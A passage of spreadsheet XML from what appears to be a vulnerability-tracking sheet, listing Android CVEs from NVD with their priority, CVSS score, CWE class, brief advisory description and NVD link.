          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G738" s="5" t="inlineStr"/>
      <c r="H738" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I738" s="5" t="inlineStr"/>
      <c r="J738" s="5" t="inlineStr"/>
      <c r="K738" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L738" s="5" t="inlineStr"/>
      <c r="M738" s="5" t="inlineStr"/>
      <c r="N738" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O738" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P738" s="5" t="inlineStr"/>
      <c r="Q738" s="5" t="inlineStr">
        <is>
          <t>CWE-356</t>
        </is>
      </c>
      <c r="R738"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S738" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28593</t>
        </is>
      </c>
    </row>
    <row r="739">
      <c r="A739" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B739" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C739" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28594</t>
        </is>
      </c>
      <c r="D739" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E739" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F739" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G739" s="5" t="inlineStr"/>
      <c r="H739" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I739" s="5" t="inlineStr"/>
      <c r="J739" s="5" t="inlineStr"/>
      <c r="K739" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L739" s="5" t="inlineStr"/>
      <c r="M739" s="5" t="inlineStr"/>
      <c r="N739" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O739" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P739" s="5" t="inlineStr"/>
      <c r="Q739" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R739" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible use after free due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="S739" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28594</t>
        </is>
      </c>
    </row>
    <row r="740">
      <c r="A740" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B740" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C740" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28599</t>
        </is>
      </c>
      <c r="D740" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E740" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F740" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G740" s="5" t="inlineStr"/>
      <c r="H740" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I740" s="5" t="inlineStr"/>
      <c r="J740" s="5" t="inlineStr"/>
      <c r="K740" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L740" s="5" t="inlineStr"/>
      <c r="M740" s="5" t="inlineStr"/>
      <c r="N740" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O740" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P740" s="5" t="inlineStr"/>
      <c r="Q740" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R740"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S740" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28599</t>
        </is>
      </c>
    </row>
    <row r="741">
      <c r="A741" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B741" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C741" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28600</t>
        </is>
      </c>
      <c r="D741" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E741" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F741" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G741" s="5" t="inlineStr"/>
      <c r="H741" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I741" s="5" t="inlineStr"/>
      <c r="J741" s="5" t="inlineStr"/>
      <c r="K741" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L741" s="5" t="inlineStr"/>
      <c r="M741" s="5" t="inlineStr"/>
      <c r="N741" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O741" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P741" s="5" t="inlineStr"/>
      <c r="Q741" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="R741"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S741" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28600</t>
        </is>
      </c>
    </row>
    <row r="742">
      <c r="A742" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B742" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C742" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28602</t>
        </is>
      </c>
      <c r="D742" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E742" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F742" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G742" s="5" t="inlineStr"/>
      <c r="H742" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I742" s="5" t="inlineStr"/>
      <c r="J742" s="5" t="inlineStr"/>
      <c r="K742" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L742" s="5" t="inlineStr"/>
      <c r="M742" s="5" t="inlineStr"/>
      <c r="N742" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O742" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P742" s="5" t="inlineStr"/>
      <c r="Q742" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R742"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S742" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28602</t>
        </is>
      </c>
    </row>
    <row r="743">
      <c r="A743" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B743" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C743" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28603</t>
        </is>
      </c>
      <c r="D743" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E743" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F743" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G743" s="5" t="inlineStr"/>
      <c r="H743" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I743" s="5" t="inlineStr"/>
      <c r="J743" s="5" t="inlineStr"/>
      <c r="K743" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L743" s="5" t="inlineStr"/>
      <c r="M743" s="5" t="inlineStr"/>
      <c r="N743" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O743" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P743" s="5" t="inlineStr"/>
      <c r="Q743" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="R743"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S743" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28603</t>
        </is>
      </c>
    </row>
    <row r="744">
      <c r="A744" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B744" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C744" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28607</t>
        </is>
      </c>
      <c r="D744" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E744" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F744" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G744" s="5" t="inlineStr"/>
      <c r="H744" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I744" s="5" t="inlineStr"/>
      <c r="J744" s="5" t="inlineStr"/>
      <c r="K744" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L744" s="5" t="inlineStr"/>
      <c r="M744" s="5" t="inlineStr"/>
      <c r="N744" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O744" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P744" s="5" t="inlineStr"/>
      <c r="Q744" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="R744"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S744" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28607</t>
        </is>
      </c>
    </row>
    <row r="745">
      <c r="A745" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B745" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C745" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28611</t>
        </is>
      </c>
      <c r="D745" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E745" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F745" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G745" s="5" t="inlineStr"/>
      <c r="H745" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I745" s="5" t="inlineStr"/>
      <c r="J745" s="5" t="inlineStr"/>
      <c r="K745" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L745" s="5" t="inlineStr"/>
      <c r="M745" s="5" t="inlineStr"/>
      <c r="N745" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O745" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P745" s="5" t="inlineStr"/>
      <c r="Q745" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R745"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S745" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28611</t>
        </is>
      </c>
    </row>
    <row r="746">
      <c r="A746" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B746" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C746" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28612</t>
        </is>
      </c>
      <c r="D746" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E746" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F746" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G746" s="5" t="inlineStr"/>
      <c r="H746" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I746" s="5" t="inlineStr"/>
      <c r="J746" s="5" t="inlineStr"/>
      <c r="K746" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L746" s="5" t="inlineStr"/>
      <c r="M746" s="5" t="inlineStr"/>
      <c r="N746" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O746" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P746" s="5" t="inlineStr"/>
      <c r="Q746" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R746"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S746" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28612</t>
        </is>
      </c>
    </row>
    <row r="747">
      <c r="A747" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B747" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C747" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28614</t>
        </is>
      </c>
      <c r="D747" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E747" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F747" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G747" s="5" t="inlineStr"/>
      <c r="H747" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I747" s="5" t="inlineStr"/>
      <c r="J747" s="5" t="inlineStr"/>
      <c r="K747" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L747" s="5" t="inlineStr"/>
      <c r="M747" s="5" t="inlineStr"/>
      <c r="N747" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O747" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P747" s="5" t="inlineStr"/>
      <c r="Q747" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="R747" s="5" t="inlineStr">
        <is>
          <t>In onCreate of SlicePermissionActivity.java, there is a possible permission bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="S747" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28614</t>
        </is>
      </c>
    </row>
    <row r="748">
      <c r="A748" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B748" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C748" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28616</t>
        </is>
      </c>
      <c r="D748" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E748" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F748" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G748" s="5" t="inlineStr"/>
      <c r="H748" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I748" s="5" t="inlineStr"/>
      <c r="J748" s="5" t="inlineStr"/>
      <c r="K748" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L748" s="5" t="inlineStr"/>
      <c r="M748" s="5" t="inlineStr"/>
      <c r="N748" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O748" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P748" s="5" t="inlineStr"/>
      <c r="Q748" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="R748" s="5" t="inlineStr">
        <is>
          <t>In Setup Wizard, there is a possible way to force connection to a malicious network due to confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="S748" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28616</t>
        </is>
      </c>
    </row>
    <row r="749">
      <c r="A749" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B749" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C749" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28620</t>
        </is>
      </c>
      <c r="D749" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E749" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F749" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G749" s="5" t="inlineStr"/>
      <c r="H749" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I749" s="5" t="inlineStr"/>
      <c r="J749" s="5" t="inlineStr"/>
      <c r="K749" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L749" s="5" t="inlineStr"/>
      <c r="M749" s="5" t="inlineStr"/>
      <c r="N749" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O749" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P749" s="5" t="inlineStr"/>
      <c r="Q749" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R749" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible unauthorized URI access due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="S749" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28620</t>
        </is>
      </c>
    </row>
    <row r="750">
      <c r="A750" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B750" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C750" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28624</t>
        </is>
      </c>
      <c r="D750" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E750" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F750" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G750" s="5" t="inlineStr"/>
      <c r="H750" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I750" s="5" t="inlineStr"/>
      <c r="J750" s="5" t="inlineStr"/>
      <c r="K750" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L750" s="5" t="inlineStr"/>
      <c r="M750" s="5" t="inlineStr"/>
      <c r="N750" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O750" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P750" s="5" t="inlineStr"/>
      <c r="Q750" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="R750"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S750" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28624</t>
        </is>
      </c>
    </row>
    <row r="751">
      <c r="A751" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B751" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C751" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28631</t>
        </is>
      </c>
      <c r="D751" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E751" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F751" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G751" s="5" t="inlineStr"/>
      <c r="H751" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I751" s="5" t="inlineStr"/>
      <c r="J751" s="5" t="inlineStr"/>
      <c r="K751" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L751" s="5" t="inlineStr"/>
      <c r="M751" s="5" t="inlineStr"/>
      <c r="N751" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O751" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P751" s="5" t="inlineStr"/>
      <c r="Q751" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="R751"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S751" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28631</t>
        </is>
      </c>
    </row>
    <row r="752">
      <c r="A752" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B752" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C752" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28634</t>
        </is>
      </c>
      <c r="D752" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E752" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F752" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G752" s="5" t="inlineStr"/>
      <c r="H752" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I752" s="5" t="inlineStr"/>
      <c r="J752" s="5" t="inlineStr"/>
      <c r="K752" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L752" s="5" t="inlineStr"/>
      <c r="M752" s="5" t="inlineStr"/>
      <c r="N752" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O752" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P752" s="5" t="inlineStr"/>
      <c r="Q752" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R752"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S752" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28634</t>
        </is>
      </c>
    </row>
    <row r="753">
      <c r="A753" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B753" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C753" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28636</t>
        </is>
      </c>
      <c r="D753" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E753" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F753" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G753" s="5" t="inlineStr"/>
      <c r="H753" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I753" s="5" t="inlineStr"/>
      <c r="J753" s="5" t="inlineStr"/>
      <c r="K753" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L753" s="5" t="inlineStr"/>
      <c r="M753" s="5" t="inlineStr"/>
      <c r="N753" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O753" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P753" s="5" t="inlineStr"/>
      <c r="Q753" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="R753"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S753" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28636</t>
        </is>
      </c>
    </row>
    <row r="754">
      <c r="A754" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B754" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C754" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28639</t>
        </is>
      </c>
      <c r="D754" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E754" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F754" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G754" s="5" t="inlineStr"/>
      <c r="H754" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I754" s="5" t="inlineStr"/>
      <c r="J754" s="5" t="inlineStr"/>
      <c r="K754" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L754" s="5" t="inlineStr"/>
      <c r="M754" s="5" t="inlineStr"/>
      <c r="N754" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O754" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P754" s="5" t="inlineStr"/>
      <c r="Q754" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R754"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S754" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28639</t>
        </is>
      </c>
    </row>
    <row r="755">
      <c r="A755" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B755" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C755" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28642</t>
        </is>
      </c>
      <c r="D755" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E755" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F755" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G755" s="5" t="inlineStr"/>
      <c r="H755" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I755" s="5" t="inlineStr"/>
      <c r="J755" s="5" t="inlineStr"/>
      <c r="K755" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L755" s="5" t="inlineStr"/>
      <c r="M755" s="5" t="inlineStr"/>
      <c r="N755" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O755" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P755" s="5" t="inlineStr"/>
      <c r="Q755" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R755"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S755" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28642</t>
        </is>
      </c>
    </row>
    <row r="756">
      <c r="A756" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B756" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C756" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28644</t>
        </is>
      </c>
      <c r="D756" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E756" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F756" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G756" s="5" t="inlineStr"/>
      <c r="H756" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I756" s="5" t="inlineStr"/>
      <c r="J756" s="5" t="inlineStr"/>
      <c r="K756" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L756" s="5" t="inlineStr"/>
      <c r="M756" s="5" t="inlineStr"/>
      <c r="N756" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O756" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P756" s="5" t="inlineStr"/>
      <c r="Q756" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="R756"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S756" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28644</t>
        </is>
      </c>
    </row>
    <row r="757">
      <c r="A757" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B757" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C757" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28650</t>
        </is>
      </c>
      <c r="D757" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E757" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F757" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G757" s="5" t="inlineStr"/>
      <c r="H757" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I757" s="5" t="inlineStr"/>
      <c r="J757" s="5" t="inlineStr"/>
      <c r="K757" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L757" s="5" t="inlineStr"/>
